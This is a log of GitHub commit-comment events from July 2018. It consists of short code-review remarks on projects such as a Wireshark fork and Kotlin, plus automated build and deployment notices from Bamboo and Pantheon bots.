{"id":"8024491368","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848265,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-26T18:37:40Z","updated_at":"2018-07-26T18:37:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:37:40Z"}
{"id":"8024492234","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848270,"position":4,"line":1046,"path":"tfshark.c","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:37:50Z","updated_at":"2018-07-26T18:37:50Z","author_association":"NONE","body":"add a trailing comma\r\n"}},"created_at":"2018-07-26T18:37:50Z"}
{"id":"8024493265","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848274,"position":12,"line":4086,"path":"tshark.c","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:38:03Z","updated_at":"2018-07-26T18:38:03Z","author_association":"NONE","body":"remove these whitespace changes"}},"created_at":"2018-07-26T18:38:03Z"}
{"id":"8024493738","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848277,"position":4,"line":2390,"path":"tshark.c","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:38:10Z","updated_at":"2018-07-26T18:38:10Z","author_association":"NONE","body":"add a trailing comma\r\n"}},"created_at":"2018-07-26T18:38:10Z"}
{"id":"8024494462","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29848279,"position":null,"line":null,"path":null,"commit_id":"a1611ac30bfc6b447985402c168fa9bfda546658","created_at":"2018-07-26T18:38:18Z","updated_at":"2018-07-26T18:38:18Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [VERSION](https://github.com/pantheon-systems/documentation/commit/fcca2842ce259f339792ce8f1f846bd9390857ff/VERSION)\n- [docs/changelog/2018/07](https://3727change-static-docs.pantheonsite.io/docs/changelog/2018/07)\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/46d74ccc11fb3e9a367c74d9d1e49eff4927537e/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T18:38:18Z"}
{"id":"8024495018","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848283,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-26T18:38:24Z","updated_at":"2018-07-26T18:38:24Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-26T18:38:24Z"}
{"id":"8024495622","type":"CommitCommentEvent","actor":{"login":"Martimiz"},"repo":{"name":"Martimiz/silverstripe-translatablegooglesitemaps"},"payload":{"comment":{"id":29848286,"position":null,"line":null,"path":null,"commit_id":"c2e65266792b1e4eac750faf8528b8f44f5c60c9","created_at":"2018-07-26T18:38:31Z","updated_at":"2018-07-26T18:38:31Z","author_association":"OWNER","body":"Thanks, should be fixed now :)"}},"created_at":"2018-07-26T18:38:31Z"}
{"id":"8024496486","type":"CommitCommentEvent","actor":{"login":"dodekeract"},"repo":{"name":"3YOURMIND/django-add-default-value"},"payload":{"comment":{"id":29848309,"position":5,"line":3,"path":"README.md","commit_id":"ae5f88f5bee4c67acf2b64f0ad9fd20358e951cd","created_at":"2018-07-26T18:38:42Z","updated_at":"2018-07-26T18:38:42Z","author_association":"MEMBER","body":"@flixx Yes, that was intentional as it’s the proper apostrophe. How did this break anything?"}},"created_at":"2018-07-26T18:38:42Z"}
{"id":"8024497241","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848355,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-26T18:38:51Z","updated_at":"2018-07-26T18:38:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:38:51Z"}
{"id":"8024502524","type":"CommitCommentEvent","actor":{"login":"dodekeract"},"repo":{"name":"3YOURMIND/django-add-default-value"},"payload":{"comment":{"id":29848429,"position":5,"line":3,"path":"README.md","commit_id":"ae5f88f5bee4c67acf2b64f0ad9fd20358e951cd","created_at":"2018-07-26T18:39:53Z","updated_at":"2018-07-26T18:39:53Z","author_association":"MEMBER","body":"@flixx Also, why did we switch back to `.rst`?"}},"created_at":"2018-07-26T18:39:53Z"}
{"id":"8024503449","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848432,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-26T18:40:05Z","updated_at":"2018-07-26T18:40:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:40:05Z"}
{"id":"8024504720","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848437,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-26T18:40:20Z","updated_at":"2018-07-26T18:40:20Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-26T18:40:20Z"}
{"id":"8024504753","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29848439,"position":63,"line":63,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-26T18:40:20Z","updated_at":"2018-07-26T18:40:20Z","author_association":"NONE","body":"Party extends AbstractParty. Can participants not be a List<Party> which is the same type?"}},"created_at":"2018-07-26T18:40:20Z"}
{"id":"8024508795","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29848447,"position":38,"line":38,"path":"java-source/src/test/java/net/corda/training/state/IOUStateTests.java","commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-26T18:41:09Z","updated_at":"2018-07-26T18:41:09Z","author_association":"NONE","body":"You shouldn't even need to throw. Just let getDeclaredField fail and that will give the unit test a good enough error message."}},"created_at":"2018-07-26T18:41:09Z"}
{"id":"8024509749","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848451,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-26T18:41:19Z","updated_at":"2018-07-26T18:41:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:41:19Z"}
{"id":"8024509785","type":"CommitCommentEvent","actor":{"login":"MCdirtyjob"},"repo":{"name":"MCdirtyjob/cts-course-dj"},"payload":{"comment":{"id":29848452,"position":null,"line":null,"path":null,"commit_id":"ea920e363f29586d27c717aab425e32d27d4c43c","created_at":"2018-07-26T18:41:19Z","updated_at":"2018-07-26T18:41:19Z","author_association":"OWNER","body":"Once again forgot about the <Clock/> "}},"created_at":"2018-07-26T18:41:19Z"}
{"id":"8024512169","type":"CommitCommentEvent","actor":{"login":"tobbi"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29848458,"position":null,"line":null,"path":null,"commit_id":"b80043ab648f7035c427120010bfb282ceff71f6","created_at":"2018-07-26T18:41:48Z","updated_at":"2018-07-26T18:41:48Z","author_association":"MEMBER","body":"Uno momento."}},"created_at":"2018-07-26T18:41:48Z"}
{"id":"8024512727","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29848460,"position":null,"line":null,"path":null,"commit_id":"afefbf48c2fdd82a60ec7c205756e484b003a5d9","created_at":"2018-07-26T18:41:56Z","updated_at":"2018-07-26T18:41:56Z","author_association":"NONE","body":"As per our conversation, no need to staticly import everything. Here it might help to get an indication that DOLLARS is coming from a Corda library."}},"created_at":"2018-07-26T18:41:56Z"}
{"id":"8024515910","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29848467,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-26T18:42:33Z","updated_at":"2018-07-26T18:42:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T18:42:33Z"}
{"id":"8024516436","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848468,"position":4,"line":27,"path":"wiretap/pcapng_module.h","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:42:39Z","updated_at":"2018-07-26T18:42:39Z","author_association":"NONE","body":"remove \"(Added)\"\r\n\r\nuse the phrase \"SSL keylog\" since that's what this is best known by\r\n"}},"created_at":"2018-07-26T18:42:39Z"}
{"id":"8024517803","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29848469,"position":26,"line":34,"path":"package.json","commit_id":"f9bcda98ca13eadaafe9b59fdd339991539c7d5e","created_at":"2018-07-26T18:42:56Z","updated_at":"2018-07-26T18:42:56Z","author_association":"NONE","body":"deprecate. see: https://moox.io/blog/deprecating-cssnext/"}},"created_at":"2018-07-26T18:42:56Z"}
{"id":"8024519902","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29848483,"position":null,"line":null,"path":null,"commit_id":"acabbe263151d4e927cb96af2ceba33016eb4839","created_at":"2018-07-26T18:43:20Z","updated_at":"2018-07-26T18:43:20Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/acabbe263151d4e927cb96af2ceba33016eb4839/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T18:43:20Z"}
{"id":"8024525399","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848493,"position":9,"line":980,"path":"wiretap/wtap_opttypes.c","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:44:25Z","updated_at":"2018-07-26T18:44:25Z","author_association":"NONE","body":"can we set this to NULL instead? and check for NULL in sdb_free_mand?\r\n"}},"created_at":"2018-07-26T18:44:25Z"}
{"id":"8024526924","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29848501,"position":null,"line":null,"path":null,"commit_id":"7cafa49a9a5ceb29429c34bff9d9ac7a3c5f1904","created_at":"2018-07-26T18:44:42Z","updated_at":"2018-07-26T18:44:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[FitnessParams-ChartView] Next and Previous buttons to slide -- Proper Alignment](https://trello.com/c/pObysA7J/77-fitnessparams-chartview-next-and-previous-buttons-to-slide-proper-alignment)"}},"created_at":"2018-07-26T18:44:42Z"}
{"id":"8024527675","type":"CommitCommentEvent","actor":{"login":"KamilJerzyWojcik"},"repo":{"name":"KamilJerzyWojcik/DrugStore"},"payload":{"comment":{"id":29848504,"position":null,"line":null,"path":null,"commit_id":"85ca38130d7288f2dfe8ba1fc07ca40795c74d4e","created_at":"2018-07-26T18:44:50Z","updated_at":"2018-07-26T18:44:50Z","author_association":"OWNER","body":"@pwasilewski-netcode\r\nDrugi warsztat"}},"created_at":"2018-07-26T18:44:50Z"}
{"id":"8024534033","type":"CommitCommentEvent","actor":{"login":"giselyalves13"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29848519,"position":null,"line":null,"path":null,"commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T18:46:03Z","updated_at":"2018-07-26T18:46:03Z","author_association":"OWNER","body":"eu esqueci 100% a segurança do tweet haha pior que eu acho que é 1 linha"}},"created_at":"2018-07-26T18:46:03Z"}
{"id":"8024534178","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29848521,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T18:46:05Z","updated_at":"2018-07-26T18:46:05Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T18:46:05Z"}
{"id":"8024534643","type":"CommitCommentEvent","actor":{"login":"ilia3101"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29848524,"position":null,"line":null,"path":null,"commit_id":"40404a28f9c61b866e31d17b7262e44310066024","created_at":"2018-07-26T18:46:11Z","updated_at":"2018-07-26T18:46:11Z","author_association":"OWNER","body":"first time using command line git"}},"created_at":"2018-07-26T18:46:11Z"}
{"id":"8024534866","type":"CommitCommentEvent","actor":{"login":"ilia3101"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29848525,"position":null,"line":null,"path":null,"commit_id":"40404a28f9c61b866e31d17b7262e44310066024","created_at":"2018-07-26T18:46:13Z","updated_at":"2018-07-26T18:46:13Z","author_association":"OWNER","body":"on linux"}},"created_at":"2018-07-26T18:46:13Z"}
{"id":"8024535802","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29848531,"position":24,"line":170,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/coroutines/CoroutineTransformerMethodVisitor.kt","commit_id":"765e2193a9654fae47f08e9187f5c59e4bf1d3e9","created_at":"2018-07-26T18:46:23Z","updated_at":"2018-07-26T18:46:23Z","author_association":"MEMBER","body":"`.toSet()`"}},"created_at":"2018-07-26T18:46:23Z"}
{"id":"8024537321","type":"CommitCommentEvent","actor":{"login":"ilia3101"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29848534,"position":null,"line":null,"path":null,"commit_id":"40404a28f9c61b866e31d17b7262e44310066024","created_at":"2018-07-26T18:46:40Z","updated_at":"2018-07-26T18:46:40Z","author_association":"OWNER","body":"hope the app still works"}},"created_at":"2018-07-26T18:46:40Z"}
{"id":"8024537463","type":"CommitCommentEvent","actor":{"login":"20kdc"},"repo":{"name":"HybridDog/simple_robots"},"payload":{"comment":{"id":29848535,"position":null,"line":null,"path":null,"commit_id":"114df74f1981adaccb9e8c80e819b97da5f1e7ea","created_at":"2018-07-26T18:46:42Z","updated_at":"2018-07-26T18:46:42Z","author_association":"NONE","body":"Above image decoded:\r\n![image](https://user-images.githubusercontent.com/22304167/43281839-995195f2-910c-11e8-8f85-d587648bb033.png)\r\n"}},"created_at":"2018-07-26T18:46:42Z"}
{"id":"8024538456","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29848536,"position":18,"line":27,"path":"package.json","commit_id":"f9bcda98ca13eadaafe9b59fdd339991539c7d5e","created_at":"2018-07-26T18:46:55Z","updated_at":"2018-07-26T18:46:55Z","author_association":"NONE","body":"What for?"}},"created_at":"2018-07-26T18:46:55Z"}
{"id":"8024539658","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29848540,"position":24,"line":170,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/coroutines/CoroutineTransformerMethodVisitor.kt","commit_id":"765e2193a9654fae47f08e9187f5c59e4bf1d3e9","created_at":"2018-07-26T18:47:08Z","updated_at":"2018-07-26T18:47:08Z","author_association":"MEMBER","body":"BTW, I'm not sure converting to set is necessary here"}},"created_at":"2018-07-26T18:47:08Z"}
{"id":"8024546315","type":"CommitCommentEvent","actor":{"login":"lain566"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29848553,"position":null,"line":null,"path":null,"commit_id":"04a25dccd88f92a457cac261b60e3c06c7082afe","created_at":"2018-07-26T18:48:21Z","updated_at":"2018-07-26T18:48:21Z","author_association":"NONE","body":"The video player works if I disable `uBO-filter`"}},"created_at":"2018-07-26T18:48:21Z"}
{"id":"8024552207","type":"CommitCommentEvent","actor":{"login":"Fishbiter"},"repo":{"name":"Fishbiter/gz3doom"},"payload":{"comment":{"id":29848575,"position":null,"line":null,"path":null,"commit_id":"044472e9b580bac93a5adcbea0203d1dc0b9b259","created_at":"2018-07-26T18:49:30Z","updated_at":"2018-07-26T18:49:30Z","author_association":"OWNER","body":"I think the issue with crashing on death is now fixed."}},"created_at":"2018-07-26T18:49:30Z"}
{"id":"8024554740","type":"CommitCommentEvent","actor":{"login":"alineAssuncao"},"repo":{"name":"alineAssuncao/CursosAlura"},"payload":{"comment":{"id":29848578,"position":null,"line":null,"path":null,"commit_id":"86fff86b2f08e91901f7532bc699e3edda3d7f59","created_at":"2018-07-26T18:50:01Z","updated_at":"2018-07-26T18:50:01Z","author_association":"OWNER","body":"teste remoção"}},"created_at":"2018-07-26T18:50:01Z"}
{"id":"8024558262","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29848585,"position":null,"line":null,"path":null,"commit_id":"ba083d8bc73280b035cffaff68780ba61b42677c","created_at":"2018-07-26T18:50:44Z","updated_at":"2018-07-26T18:50:44Z","author_association":"COLLABORATOR","body":"Puzzle `927-e88d3d70` discovered in   [`src/main/java/ru/mystamps/web/service/SeriesService.java`](  https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesService.java)   and submitted as #932. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-26T18:50:44Z"}
{"id":"8024559679","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29848587,"position":null,"line":null,"path":null,"commit_id":"0447c0c7f7eb1b9f18a1b7cab7ddd8f88da62971","created_at":"2018-07-26T18:51:00Z","updated_at":"2018-07-26T18:51:00Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/0447c0c7f7eb1b9f18a1b7cab7ddd8f88da62971/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T18:51:00Z"}
{"id":"8024563845","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29848596,"position":null,"line":null,"path":null,"commit_id":"27b09abacf10cf2cbac593f4b29b3cff81f3c2ac","created_at":"2018-07-26T18:51:50Z","updated_at":"2018-07-26T18:51:50Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpress4](https://wordpress4-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/caching-advanced-topics](https://wordpress4-static-docs.pantheonsite.io/docs/caching-advanced-topics)\n"}},"created_at":"2018-07-26T18:51:50Z"}
{"id":"8024564542","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848598,"position":5,"line":1368,"path":"wiretap/wtap.h","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:51:58Z","updated_at":"2018-07-26T18:51:58Z","author_association":"NONE","body":"call this len or count or something, otherwise it could be mistaken for a pointer :-)\r\n"}},"created_at":"2018-07-26T18:51:58Z"}
{"id":"8024565549","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29848602,"position":null,"line":null,"path":null,"commit_id":"40404a28f9c61b866e31d17b7262e44310066024","created_at":"2018-07-26T18:52:10Z","updated_at":"2018-07-26T18:52:10Z","author_association":"COLLABORATOR","body":"For me it does 😄 "}},"created_at":"2018-07-26T18:52:10Z"}
{"id":"8024569379","type":"CommitCommentEvent","actor":{"login":"cqbent"},"repo":{"name":"cqbent/masc-site"},"payload":{"comment":{"id":29848612,"position":null,"line":null,"path":null,"commit_id":"cff6c0303278132fa38c26aa3348017388aa164f","created_at":"2018-07-26T18:52:55Z","updated_at":"2018-07-26T18:52:55Z","author_association":"OWNER","body":"Created multidev environment [masc-site#ci-82](https://dashboard.pantheon.io/sites/f42e5ac8-ed69-4d8a-ad5e-2220e369251f#ci-82).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-82-masc-site.pantheonsite.io/)"}},"created_at":"2018-07-26T18:52:55Z"}
{"id":"8024570729","type":"CommitCommentEvent","actor":{"login":"plzombie"},"repo":{"name":"plzombie/ne"},"payload":{"comment":{"id":29848615,"position":null,"line":null,"path":null,"commit_id":"b18eb6de0ace73b822895942427d343daacd4f51","created_at":"2018-07-26T18:53:10Z","updated_at":"2018-07-26T18:53:10Z","author_association":"OWNER","body":"media/test.txt only differ by removed BOM"}},"created_at":"2018-07-26T18:53:10Z"}
{"id":"8024571956","type":"CommitCommentEvent","actor":{"login":"monzurulislam"},"repo":{"name":"monzurulislam/Oj-solution"},"payload":{"comment":{"id":29848618,"position":null,"line":null,"path":null,"commit_id":"ee076e8c008bfc5e8415a54e3b5f0c52dc3de726","created_at":"2018-07-26T18:53:24Z","updated_at":"2018-07-26T18:53:24Z","author_association":"OWNER","body":"For beginner"}},"created_at":"2018-07-26T18:53:24Z"}
{"id":"8024572095","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29848619,"position":null,"line":null,"path":null,"commit_id":"9a1811354b4a5767d1e250dcc2889e6ab735cc55","created_at":"2018-07-26T18:53:25Z","updated_at":"2018-07-26T18:53:25Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-56](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-56).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-56-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-26T18:53:25Z"}
{"id":"8024573223","type":"CommitCommentEvent","actor":{"login":"lassoan"},"repo":{"name":"Slicer/SlicerJupyter"},"payload":{"comment":{"id":29848621,"position":null,"line":null,"path":null,"commit_id":"d54771c0aa81fb10cc6d079dc23c3e86764e5032","created_at":"2018-07-26T18:53:38Z","updated_at":"2018-07-26T18:53:38Z","author_association":"CONTRIBUTOR","body":"Can you describe what exactly causes confusion? Startup time may be unusually long, but you can see \"Kernel starting, please wait...\" message in the notebook. Maybe it works differently on Mac, but for me on Windows it looks OK.\r\n\r\nWould showing splashscreen help? Or should we create two kernels - one would show the Slicer window, while the other would keep it minimized?\r\n\r\nIf you just want to review/update/re-run a notebook it would be quite annoying to have Slicer window popping up in front of the notebook.\r\n\r\n"}},"created_at":"2018-07-26T18:53:38Z"}
{"id":"8024580543","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29848640,"position":null,"line":null,"path":null,"commit_id":"0ba3ef0d1b1051fe706e9dc762c9eb8eb0973b5e","created_at":"2018-07-26T18:55:05Z","updated_at":"2018-07-26T18:55:05Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/0ba3ef0d1b1051fe706e9dc762c9eb8eb0973b5e/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T18:55:05Z"}
